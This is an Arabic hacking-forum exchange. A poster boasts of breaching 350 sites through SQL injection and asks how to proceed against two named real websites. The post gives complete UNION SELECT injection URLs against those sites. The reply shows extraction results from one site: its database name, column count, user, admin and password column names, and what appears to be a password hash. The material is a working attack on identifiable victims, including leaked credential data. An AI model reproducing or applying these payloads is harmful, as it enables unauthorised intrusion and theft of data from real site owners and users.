 | اقتباس |  | | |  |  المشاركة الأصلية كتبت بواسطة guba.1 |  | | | | | | | | | سلام عليكم ورحمه الله
اخواني انا واعوذ بالله من كلمه انا اخترقت 350 موقع بـ الـ sql يعني ولحمد لله متمكن من هاذي الثغره
لااكن واجهتني مشكله فـ الاونه الاخيره
وهيا مثل هاذا الموقع ... كود PHP: http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29--
وهاذا .. كود PHP: http://hotelacostacentro.com/noticia.php?id=-11%27%20UNION%20SELECT%201,2,3,4,%28CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,6,7,8,9,10,11,12+from+information_schema.columns%29--%20-
والكثير الكثير مثل هاذي المشكله
فـ اتمنى طريقة حل هاذي المشكله وطرح الطريقه لتعم الفائده الرجاء اي شخص يمر ع الموضوع يشارك ولو بظم صوته الى صوتي ..,
احترامي , | |  | |  | |
http://hotelacostacentro.com/noticia.php?id=-11
user
admin
password
5e7cf5d0c1214aacb755776e9f6a9449
hint
table_name) of information_schema.tables where table_schema=0x61636F7374615F63656E74726F
MySQL >=5
Column Count is 12
Column is 4
DB: acosta_centro
inject type mssql
راجع دروس الاخ عبد الصمد